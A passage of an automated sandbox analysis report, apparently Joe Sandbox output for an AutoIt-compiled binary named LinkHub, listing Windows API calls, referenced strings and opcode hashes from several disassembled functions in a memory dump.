                                                                    • Opcode Fuzzy Hash: 6fd6ae4c54cd8dccb4f551bb6c7e30b75b9290776edbb0d29d386ec48d996d3e
                                                                    • Instruction Fuzzy Hash: ED1106716626327AD7344F628C49EF7FF5CEB127E4F104226F50982080EAA49850E2F0
                                                                    APIs
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 002A761D
                                                                    • _wcslen.LIBCMT ref: 002A7629
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$BuffCharUpper
                                                                    • String ID: STOP
                                                                    • API String ID: 1256254125-2411985666
                                                                    • Opcode ID: 99022dbe993b044569e60f3b0258b6c52f0cd779e64408e1378dbcd705296fc7
                                                                    • Instruction ID: ca227202a6002e13fa1739ad1d3e07d44f532319c21b074f9428431e2e791b23
                                                                    • Opcode Fuzzy Hash: 99022dbe993b044569e60f3b0258b6c52f0cd779e64408e1378dbcd705296fc7
                                                                    • Instruction Fuzzy Hash: AF010432A349278BCB10AEBDDC40ABF33B9AF62B50B000524E42192290EF70D820DA84
                                                                    APIs
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                      • Part of subcall function 002A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002A4620
                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 002A2699
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: 593074d0aedb99a80890b162af74319309caa3eaf4413c69d3b537b1cd0c5538
                                                                    • Instruction ID: 95bdd49d4b99302d8bbe477531092b08832d2268931c1f7fabb003c3e242d63b
                                                                    • Opcode Fuzzy Hash: 593074d0aedb99a80890b162af74319309caa3eaf4413c69d3b537b1cd0c5538
                                                                    • Instruction Fuzzy Hash: 2601F575A22115EBCB09AB68CC51CFE7778EF9A710B40061AE432972C5DE71982CCE50
                                                                    APIs
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                      • Part of subcall function 002A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002A4620
                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 002A2593
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: b8dd52835facf11e07e4811c4460bd4653975ee69d03b429dceab04568a858cc
                                                                    • Instruction ID: 961399ff920e220925b75c4e14e194c7361e2c43f2f34eaf17c0d0f8b20be482
                                                                    • Opcode Fuzzy Hash: b8dd52835facf11e07e4811c4460bd4653975ee69d03b429dceab04568a858cc
                                                                    • Instruction Fuzzy Hash: AB01D875E61105ABCB0DEB54C926DFE77A8DF56340F900026A80267281DE50DE2CCAB1
                                                                    APIs
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                      • Part of subcall function 002A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002A4620
                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 002A2615
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: 6b8c86b4c22c96411250135e8e9d7f2f53be4365fadbb00a2e322dacad536642
                                                                    • Instruction ID: 18fc1a3d08f20a265f767585020256e76b044aaa95fb42bb3900d882911276f7
                                                                    • Opcode Fuzzy Hash: 6b8c86b4c22c96411250135e8e9d7f2f53be4365fadbb00a2e322dacad536642
                                                                    • Instruction Fuzzy Hash: ED01F771E21105A7CB0AEB54D812EFE77ACDB16740F500026B802A3181DE60CE2CCAB1
                                                                    APIs
                                                                      • Part of subcall function 0024B329: _wcslen.LIBCMT ref: 0024B333
                                                                      • Part of subcall function 002A45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002A4620
                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 002A2720
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 624084870-1403004172
                                                                    • Opcode ID: 52d80da8130af133562e012738b84d990c741783aeee5e8544b7f3f6ab7382db
                                                                    • Instruction ID: 0c85e02aa70dfe442c2f19099b3db39240bd4303fdcc56cc7b16b64d88336ea7
                                                                    • Opcode Fuzzy Hash: 52d80da8130af133562e012738b84d990c741783aeee5e8544b7f3f6ab7382db
                                                                    • Instruction Fuzzy Hash: FAF0F975E61114A7D70AB7689C52FFEB76CEF16740F400916F422A72C1DF60D92CCA50
                                                                    APIs
                                                                      • Part of subcall function 0024249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002424B0
                                                                    • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 002D9B6D
                                                                      • Part of subcall function 00242234: GetWindowLongW.USER32(?,000000EB), ref: 00242242
                                                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 002D9B53
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow$MessageProcSend
                                                                    • String ID: (1
                                                                    • API String ID: 982171247-3903994380
                                                                    • Opcode ID: 26e2343f19e757d1c65db8db54d9c8fe8815587c756e141bb883e30ddc10bc5c
                                                                    • Instruction ID: 58be4c7178925649565aa17e73ceaa3fcae209387a6c2c4ed8a13e741d0f1535
                                                                    • Opcode Fuzzy Hash: 26e2343f19e757d1c65db8db54d9c8fe8815587c756e141bb883e30ddc10bc5c
                                                                    • Instruction Fuzzy Hash: 1001D430211214AFDB259F14EC48F963B66FB85369F10055BF9021A2E0C7B26C75DB50
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 2<'$j3.
                                                                    • API String ID: 0-3764666791
                                                                    • Opcode ID: cb1c782fb6755614e06f4f50775220443ecf8f8ef771ca3788b3e78eedc7d4ca
                                                                    • Instruction ID: f7e529784e90a670d4a0ff4daae8dfad9a0cad1a343c66f7092aaf31fb9f9f85
                                                                    • Opcode Fuzzy Hash: cb1c782fb6755614e06f4f50775220443ecf8f8ef771ca3788b3e78eedc7d4ca
                                                                    • Instruction Fuzzy Hash: 90F0B43552414AAADB14DF95C852AF973B8DF04700F10806ABCCDC7290EBB58FA0E3A5
                                                                    APIs
                                                                      • Part of subcall function 0024249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002424B0
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002D8471
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 002D847F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID: (1
                                                                    • API String ID: 1378638983-3903994380
                                                                    • Opcode ID: dba11c9f2534e1f47edf65f220f2785d00316ba28314738fa2642bff376bb66b
                                                                    • Instruction ID: 5e396e4f2104baa99abbabdb5e3f096d92a707e8f4fed1e61f6d82c23e8d7b16
                                                                    • Opcode Fuzzy Hash: dba11c9f2534e1f47edf65f220f2785d00316ba28314738fa2642bff376bb66b
                                                                    • Instruction Fuzzy Hash: C3F04F35111285DFC705DF69EC44DAA77A9FB8A320B10862AFA26873F0CB709C30DB50
                                                                    APIs
                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002A146F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Message
                                                                    • String ID: AutoIt$Error allocating memory.
                                                                    • API String ID: 2030045667-4017498283
                                                                    • Opcode ID: a8633ec7ed86e4bf1c2dba63bb8cc89ddcac439943ec067a9ff09fdce62604cf
                                                                    • Instruction ID: 2642762f3683b8a313cab08cd6307386ab67a79b553b25b6aebaafa12a5202db
                                                                    • Opcode Fuzzy Hash: a8633ec7ed86e4bf1c2dba63bb8cc89ddcac439943ec067a9ff09fdce62604cf
                                                                    • Instruction Fuzzy Hash: 15E0D8312A472437D2143794BC03FC976888F06B61F11441BF78C545C38EE328B056D9
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(56003086,?), ref: 0029E797
                                                                    • FreeLibrary.KERNEL32 ref: 0029E7BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID: X64
                                                                    • API String ID: 3013587201-893830106
                                                                    • Opcode ID: b13d444c6cf13ca8aadd1390df22a4ad2e59d4346cf49e522ea0b652c7122b6a
                                                                    • Instruction ID: 88bf475bf08bf0f7b10ba387043e02adcd7ace761b82d62406508d5bd7787056
                                                                    • Opcode Fuzzy Hash: b13d444c6cf13ca8aadd1390df22a4ad2e59d4346cf49e522ea0b652c7122b6a
                                                                    • Instruction Fuzzy Hash: 5CE02BB5439A068BDF75EB604D48E993618BB10701B120599E542D2011DB71CD94CB54
                                                                    APIs
                                                                      • Part of subcall function 0025FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,002610E2,?,?,?,0024100A), ref: 0025FAD9
                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,0024100A), ref: 002610E6
                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0024100A), ref: 002610F5
                                                                    Strings
                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002610F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                    • API String ID: 55579361-631824599
                                                                    • Opcode ID: 3e41b2d3429bf2a6e378fc9b835d124143ca41e5e778165407d849e942fd1169
                                                                    • Instruction ID: bc99be75773e7bfadf7b2b05b7c00f591578c076de1c50ba5697da23cb212162
                                                                    • Opcode Fuzzy Hash: 3e41b2d3429bf2a6e378fc9b835d124143ca41e5e778165407d849e942fd1169
                                                                    • Instruction Fuzzy Hash: D6E06D706107918BD3209F35E949742BBE4AB04305F088D6DEC89C2251DBB4E4E4CF91
                                                                    APIs
                                                                    • __Init_thread_footer.LIBCMT ref: 0025F151
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Init_thread_footer
                                                                    • String ID: `51$h51
                                                                    • API String ID: 1385522511-1146614990
                                                                    • Opcode ID: 21389dfa45709181273524830c3c2082ca44ac2eb81399fd6bdfec25e91a6a96
                                                                    • Instruction ID: abe9bc5788e59af725944c6c9ec6c2d7e8de4f85f0bb76ece9aa0972318f10d6
                                                                    • Opcode Fuzzy Hash: 21389dfa45709181273524830c3c2082ca44ac2eb81399fd6bdfec25e91a6a96
                                                                    • Instruction Fuzzy Hash: 90E0D8B54B4C14CBC546D72CD9419C43366B70EB21F508174E50647291C7301E92DE18
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 002B39F0
                                                                    • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 002B3A05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Temp$FileNamePath
                                                                    • String ID: aut
                                                                    • API String ID: 3285503233-3010740371
                                                                    • Opcode ID: ab5e41cfe395d832239b1f59a57d304bd76000a384c55144157df0c3cade3162
                                                                    • Instruction ID: 88f67f61235d86c004ecd658c2888a254e6d01a3fe18b19f0442c5ebd6490c65
                                                                    • Opcode Fuzzy Hash: ab5e41cfe395d832239b1f59a57d304bd76000a384c55144157df0c3cade3162
                                                                    • Instruction Fuzzy Hash: C2D05B7190131477DA209754AC0DFCB7B6CDB44710F000191BE55910D1DAF0E945C790
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002D2DC8
                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002D2DDB
                                                                      • Part of subcall function 002AF292: Sleep.KERNEL32 ref: 002AF30A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 3191fa16af69bcb272b380f86264083e19ed7d76b05ff8d37c950f83ff189820
                                                                    • Instruction ID: 1f384237fed0c31bbe8ac13a6205c8ea6c2a212cff2a72b063d0f359084a1cfb
                                                                    • Opcode Fuzzy Hash: 3191fa16af69bcb272b380f86264083e19ed7d76b05ff8d37c950f83ff189820
                                                                    • Instruction Fuzzy Hash: A7D02235B96300B7E268B370BC4FFE23B189F00B00F100822B709AA0C0C8E0AC00CA84
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002D2E08
                                                                    • PostMessageW.USER32(00000000), ref: 002D2E0F
                                                                      • Part of subcall function 002AF292: Sleep.KERNEL32 ref: 002AF30A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: 1c23ce5b2768d08f86f47b201381f1a658638f2fcbc8bac19d853921bb5d402c
                                                                    • Instruction ID: a6de1e30e9e93a070583e831004e414a68b48be0dda9b774e364d547a3f085db
                                                                    • Opcode Fuzzy Hash: 1c23ce5b2768d08f86f47b201381f1a658638f2fcbc8bac19d853921bb5d402c
                                                                    • Instruction Fuzzy Hash: 1FD0A931B823006BE268A370BC4FFD22B189B00B00F500822B605AA0C0C8A0A8008A88
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0027C213
                                                                    • GetLastError.KERNEL32 ref: 0027C221
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0027C27C
                                                                    Memory Dump Source
                                                                    • Source File: 00000015.00000002.2118358766.0000000000241000.00000020.00000001.01000000.00000008.sdmp, Offset: 00240000, based on PE: true
                                                                    • Associated: 00000015.00000002.2118335146.0000000000240000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.00000000002DD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118419182.0000000000303000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118471144.000000000030D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000015.00000002.2118492603.0000000000315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_21_2_240000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1717984340-0
                                                                    • Opcode ID: fde43a52a6d51f93a7d44a2c815cd6b24eed00873e03ac8ee925a1a5e21292f9
                                                                    • Instruction ID: 43d313226d4a62a8df84b120064b91fa1d38a56e406747464f7bb4473c1837c1
                                                                    • Opcode Fuzzy Hash: fde43a52a6d51f93a7d44a2c815cd6b24eed00873e03ac8ee925a1a5e21292f9
                                                                    • Instruction Fuzzy Hash: 0541E830620606AFDB219FF5D844AAA77A9EF15310F34C16EEC5DA71A2DB308C20CB60